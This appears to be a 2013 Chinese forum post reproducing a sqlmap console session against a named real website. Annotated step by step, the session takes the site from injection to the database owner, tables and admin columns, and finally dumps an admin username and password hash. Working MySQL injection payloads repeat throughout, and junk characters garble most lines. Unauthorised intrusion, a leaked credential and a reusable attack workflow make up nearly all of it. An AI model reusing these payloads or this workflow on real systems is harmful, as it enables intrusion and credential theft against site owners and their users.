D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
2 A5 T h+ Q3 R) U' b, x4 bms "Mysql" --current-user /* 注解:获取当前用户名称/ `' q1 m3 l; z) r+ |( i# Z2 B
sqlmap/0.9 - automatic SQL injection and database takeover tool
& L; r4 g3 J5 k' j( n+ j0 y g http://sqlmap.sourceforge.net starting at: 16:53:54
, z( n) Q v8 E2 `$ y4 F[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
/ f1 r }$ B2 ~: b7 F session file$ {/ B8 q* ?5 V
[16:53:54] [INFO] resuming injection data from session file
/ i3 a* {0 W* m! k4 p: L[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
; i7 Y+ M) |3 }[16:53:54] [INFO] testing connection to the target url
$ s# t0 I; b* l1 Csqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 x9 c% b# w) ?/ J4 S Qsts:" F0 M! {5 [) \8 _* `1 F+ |9 }( r
---
; U" y T9 K+ J* D" d( HPlace: GET
8 b5 f* l4 U( X; j; s1 b7 CParameter: id& \7 Q. y+ S4 R
Type: boolean-based blind' X, n* }4 F Q) z. O; v/ g
Title: AND boolean-based blind - WHERE or HAVING clause0 q* I' N( m) ^
Payload: id=276 AND 799=799 T! V* `2 D( x( }
Type: error-based0 n9 q! ^( \+ O( h
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* O1 e, l" H" r+ A }
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 ?" Z+ w$ I% E- j3 u* |120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 g1 p; y6 R; C" D! V7 i1 ^8 o),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 C2 \ A1 l1 C) k% L+ m! P* A
Type: UNION query2 K& g( e7 T4 `. |+ H, z
Title: MySQL UNION query (NULL) - 1 to 10 columns
* t4 ~: |% e; o" E3 x Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR$ h; q0 J9 J5 a O/ m
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 g# G' y6 j# Z6 a# v D+ Q. b
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# ^, j- }/ U5 n8 V9 f$ v
Type: AND/OR time-based blind5 m# b* f5 @" J
Title: MySQL > 5.0.11 AND time-based blind O6 S5 l( C7 g N1 L$ X7 {' a
Payload: id=276 AND SLEEP(5); E( n% z# O9 F7 U* y
---8 u1 l2 }- d3 Y0 ~* U* s* J, u
[16:53:55] [INFO] the back-end DBMS is MySQL
" H o: B6 J: ]. ?web server operating system: Windows
' r, p+ y V+ M( Y& \: [web application technology: Apache 2.2.11, PHP 5.3.0
: o1 V- x6 l3 {1 sback-end DBMS: MySQL 5.0
, g6 `1 {; S/ _" _5 Y2 i4 I[16:53:55] [INFO] fetching current user! p' v$ C' Q# e% g
current user: 'root@localhost'
5 P$ a) c0 o# z0 w1 X h+ r3 F[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
5 j1 @. B1 `( f/ Utput\www.wepost.com.hk' shutting down at: 16:53:58
& X5 o$ ]/ `1 d3 n6 o4 k! ^4 |2 {7 [0 o3 {
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
1 v& V0 F2 c5 Lms "Mysql" --current-db /*当前数据库, L4 [, D* a6 i* T
sqlmap/0.9 - automatic SQL injection and database takeover tool! O I7 s, C3 B! ?. o: z
http://sqlmap.sourceforge.net starting at: 16:54:162 r0 b. W$ ] Z/ g
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
1 h! d: e6 s% f7 w session file1 ` l/ o v- T9 P6 Y
[16:54:16] [INFO] resuming injection data from session file4 l; f; C! [ ]
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
8 b* o! s0 O9 {9 H/ W5 ^/ W, K[16:54:16] [INFO] testing connection to the target url
1 |9 \* e9 I! Q9 ~7 v) l; Rsqlmap identified the following injection points with a total of 0 HTTP(s) reque# ~* ]: b9 E3 l0 t8 b% _
sts:
: G7 w" A6 ]/ \. n1 C+ W8 M9 l---
B1 o K; v8 u" d7 `+ JPlace: GET9 R, Q; {) O3 z
Parameter: id
. m" S$ V% ~* t S7 a Type: boolean-based blind
8 K' ~4 m- f+ B% I+ y9 ^; {8 Y Title: AND boolean-based blind - WHERE or HAVING clause) `- T6 m; x) \& H9 f# Q$ n
Payload: id=276 AND 799=799: m0 S+ _) h( X1 k! w; s2 [4 P
Type: error-based$ ~( e5 w, E' v0 Y8 Y/ w! |$ I
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: z3 p: d% y0 F2 g6 T: [
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 u+ Y5 h0 x: v* U* H120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% Z: M- ?& X. e! p; {: ?
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- p9 N. t( d6 I; k9 {; @
Type: UNION query
% G a3 u" m) s. r& T+ y& j Title: MySQL UNION query (NULL) - 1 to 10 columns3 n4 s( [/ \7 N0 Y$ P
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR$ Q8 h# j( L! R* j
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ X" G! D- c ` oCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' c1 A& \; x8 b Type: AND/OR time-based blind9 X: r2 ?5 {$ _0 }3 h6 B+ P
Title: MySQL > 5.0.11 AND time-based blind, f- e' q+ _& U, l7 q+ w! K4 K
Payload: id=276 AND SLEEP(5)
/ m6 j+ P. k1 [2 p% r$ Y9 |--- c" S4 a) z' m J! F) _
[16:54:17] [INFO] the back-end DBMS is MySQL
! M" i; j# N0 u5 Iweb server operating system: Windows& f, ~) z) Q; c) `( A" ~
web application technology: Apache 2.2.11, PHP 5.3.0$ \, m# Q* t' E' x/ Z
back-end DBMS: MySQL 5.0! G% t9 m% o( }' C: F) S$ O* t
[16:54:17] [INFO] fetching current database
A# P4 N1 Y2 D5 F9 Dcurrent database: 'wepost'% |! H1 W5 k H% e' c
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou3 P c ]( |! A9 ?/ w
tput\www.wepost.com.hk' shutting down at: 16:54:18& F7 K9 Y" N! f! r6 v2 _
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db _; T `& k1 L: |
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
r( K* M# {, G8 o# o sqlmap/0.9 - automatic SQL injection and database takeover tool3 P( q) I X5 o0 ]* g, s
http://sqlmap.sourceforge.net starting at: 16:55:25
- C( ~4 n }" ]; O! k3 R+ x[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 \+ }7 U* |- Y
session file; ~& P$ [) C& v" }3 X1 @# g/ D# h
[16:55:25] [INFO] resuming injection data from session file
: V( ?. D; |! X7 ^2 f* v$ U* {[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file' B) F T& p( N% \3 J
[16:55:25] [INFO] testing connection to the target url
5 Y* ^7 Y0 z8 }4 _# asqlmap identified the following injection points with a total of 0 HTTP(s) reque# q3 L4 K6 e& I' a
sts:. }) Y( N4 a' ]1 a6 `( z
---
, i j l4 V. Z$ GPlace: GET& B9 Z n; y) L
Parameter: id4 W; n1 W, n3 o4 z$ z, P* @
Type: boolean-based blind
' X% T1 G1 E: V- @7 w6 {1 N: s9 C. n Title: AND boolean-based blind - WHERE or HAVING clause- d* Q8 ^% L) c$ _; x% F
Payload: id=276 AND 799=799
" }, T1 Q& t8 Y4 K8 Y) @ Type: error-based1 J5 R. G$ I0 Y
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) f$ @5 w- }& z, t, e( F9 o& N
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
) u' A" g# O4 k8 a0 K) H$ V, n120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
" U, f/ e9 t" C! p),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ }) \6 e7 k% d1 {. \
Type: UNION query6 L, X$ n. h2 o+ J3 x6 D
Title: MySQL UNION query (NULL) - 1 to 10 columns
( i e+ X$ }$ t5 p, G Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
' z$ C) o R0 N(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 L/ W! B" k) g
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 B4 e8 t) }5 q8 c3 w+ }) d
Type: AND/OR time-based blind
1 Z6 C& n/ Q9 b8 y7 f ]9 ~ Title: MySQL > 5.0.11 AND time-based blind9 |2 {: n% n. S/ m
Payload: id=276 AND SLEEP(5)( X0 v+ T. B5 z) T
---
8 q; d* S3 [, d0 U% q[16:55:26] [INFO] the back-end DBMS is MySQL9 L: L" z3 |, _0 B1 _" u
web server operating system: Windows( A. x7 |" i3 ]+ i# V) Q, E
web application technology: Apache 2.2.11, PHP 5.3.0
+ W K5 r& u: ^) I+ e( i$ @4 Fback-end DBMS: MySQL 5.0/ v$ f, @$ c' ]# y
[16:55:26] [INFO] fetching tables for database 'wepost'% s4 C$ y+ W" J" A3 f
[16:55:27] [INFO] the SQL query used returns 6 entries
+ F2 ]; w9 V0 Q4 e# ODatabase: wepost
7 l6 z# U) N2 K; y[6 tables]
* r+ i0 @$ j/ ]+ H- n+-------------+( v2 g. t1 Y2 W: O
| admin |
6 b7 n& a+ \3 _, p| article |
( S" I* u- O5 a; z- r7 d9 u| contributor |' G( c4 J' ?$ m { S
| idea |9 i/ r/ l4 x v0 k, S; _
| image |
% w+ T8 W0 O6 k9 S B* W& _| issue |
6 V3 Q' |3 n- M z+-------------+
g4 z6 N: W* m6 _ i1 V[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou1 j+ ?8 L$ B1 [9 _
tput\www.wepost.com.hk' shutting down at: 16:55:33
4 v6 h1 v4 W: J, h4 C, A0 J3 J* u& Q$ X1 r6 o, L! w
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, q4 z# R( S1 s% B' mms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名- M8 b. ~8 i1 ]- p! X2 D' p) P
sqlmap/0.9 - automatic SQL injection and database takeover tool, U4 v1 M7 V9 W! N+ q, l
http://sqlmap.sourceforge.net starting at: 16:56:06( t2 [7 k2 H/ w' l+ u
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 j# G2 p" H! m2 [$ X: ^# W: Csts:
, ?) g/ K9 {; M1 b' L) [2 ]' X---
7 I- e: T1 |: ^ o- W6 aPlace: GET, G9 f3 Y! A& ~. F
Parameter: id Y1 v0 i, t0 \; ], E8 n- t
Type: boolean-based blind" G( c) o4 F2 v, c8 N
Title: AND boolean-based blind - WHERE or HAVING clause
( W0 l8 s3 r8 I$ B7 Y C& s3 [8 q Payload: id=276 AND 799=799. ]# Z i# S) b
Type: error-based0 ~5 ^! X, N$ [; x$ G
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1 I* q/ W/ C: ?* k! H Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 b6 v1 ?1 u: J2 C& L. H
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' Y6 W# z/ J# V! y" p8 X) b
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 K+ x0 h$ ~$ Q; j4 b& E
Type: UNION query
5 W2 O7 k' g9 v Title: MySQL UNION query (NULL) - 1 to 10 columns
2 D1 @7 Z8 H9 H6 {3 G8 ^ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ @& z6 B2 b/ x, y. f x" A
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
- W4 W8 Z# j' U$ M* {4 ZCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 ?) N% J, W$ T
Type: AND/OR time-based blind- s" Q { r. V7 J, ~! g
Title: MySQL > 5.0.11 AND time-based blind
. J+ z9 ?. p! ?( o3 \6 C Payload: id=276 AND SLEEP(5)
1 s; D8 Q2 p5 ~6 x---0 o8 d' J9 `2 p& r
web server operating system: Windows, M- o, B) B- S' ?! g: h
web application technology: Apache 2.2.11, PHP 5.3.0
\6 [: ? j- b! Q- I6 m- Jback-end DBMS: MySQL 5.0
g6 C- Z- b0 l" f[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se$ z/ [& B) M/ r0 y( L. ^1 [' n
ssion': wepost, wepost- w- Y& p8 o% v) W5 v& t! _8 e
Database: wepost
1 h7 q) ]# h8 c6 z- F! l% k. QTable: admin9 z, |5 U6 h; a. w# {. z; j
[4 columns]
: I6 ^' w; N; i$ |0 x; j+----------+-------------+* i) S) L+ W3 }, p Q+ M* G( t
| Column | Type |
& M. \2 c8 V) N) r P+----------+-------------+
) s( I+ G2 j( v$ I# [9 y1 L- a" B| id | int(11) |
; J2 z5 y. W$ Q| password | varchar(32) |, _+ P# A) M: p- E2 F* t* Q7 T) S
| type | varchar(10) |
# `4 d+ V3 R( Z. ]' A| userid | varchar(20) |
" Z2 d/ Z' R" E+----------+-------------+) t/ W8 n/ d4 }& n8 V
shutting down at: 16:56:19' |1 a# B2 h2 \
' _7 u( F9 I9 G6 R: UD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; p7 V( {7 f9 W3 ^& u
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容* ` Z, ~% T3 B; A% H
sqlmap/0.9 - automatic SQL injection and database takeover tool
( N; V1 E; z" M( b ~7 u4 t0 u! j1 C http://sqlmap.sourceforge.net starting at: 16:57:14
0 n) M; {" ~# dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ k, X9 o- _! M j4 r- q% qsts:' C3 n0 S, ^4 f9 n* @& o% e* c
---% F/ _: @! W3 k$ c
Place: GET
0 g0 d/ G, w3 ^1 x) @: L1 \Parameter: id
4 {4 G8 r- ~7 R$ _- g Type: boolean-based blind; L% T' W' u2 v+ _9 o6 R% H; B$ K
Title: AND boolean-based blind - WHERE or HAVING clause. X( S( R! p% p2 x4 j
Payload: id=276 AND 799=799! h1 v0 _/ c2 N% c- x7 {
Type: error-based
+ T. u1 h# M& r; z3 j Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
, Z$ _8 M: A* Y* v2 y4 T2 _" s; j Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 B( @1 r0 v6 ^
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 S8 F; g E$ H% v, r" y& [3 l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 _) m4 E3 V/ Y4 D0 a" c
Type: UNION query Y" T( s$ L4 o) s4 F2 N( \ ~
Title: MySQL UNION query (NULL) - 1 to 10 columns' x! e* |6 b& {9 ~( O5 g; n
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
* K4 s( Y, o+ n3 A5 ~' I(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- y" c+ L* H/ ~; _2 v
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; U! n1 u% T/ N& e
Type: AND/OR time-based blind
+ T m1 x) ?8 f+ n, o' `& x Title: MySQL > 5.0.11 AND time-based blind6 b7 v2 S3 ^+ G# i: `
Payload: id=276 AND SLEEP(5)
3 j3 m+ @0 C8 d, x---
$ j& N5 v5 t1 g5 n& Qweb server operating system: Windows+ u0 h8 x9 N, Q$ J
web application technology: Apache 2.2.11, PHP 5.3.0
$ l) H8 p' t' X, M: E/ ?7 H- S( G2 Qback-end DBMS: MySQL 5.0+ I& ?8 U! P! f. H) g& f
recognized possible password hash values. do you want to use dictionary attack o
5 ~3 t6 B( J3 F# An retrieved table items? [Y/n/q] y( ^+ }$ S0 R9 g4 M* \
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt] h0 x6 L3 L& l: t7 ]! _
do you want to use common password suffixes? (slow!) [y/N] y
7 ]7 z2 l9 |8 l, S9 k8 l; VDatabase: wepost
1 W3 T# T" U1 x# ?Table: admin$ u4 G! v% @- U1 E
[1 entry]
/ c3 A2 k' s8 @, Q+ y' x+ B/ {+----------------------------------+------------+
! l- w! u! N" y/ z& U# s| password | userid |% {' i7 U4 i' C/ p4 ?
+----------------------------------+------------+
3 s. |" V$ r* h; ^/ k| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
: ~+ k+ }5 R! `5 ^3 ~( G+----------------------------------+------------+# G! D" E2 Z$ i$ k) ?4 u5 N
shutting down at: 16:58:14( e# o& K4 S4 R$ P( @
+ v0 ?3 G1 R5 I# e: @& y% y& k. e
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对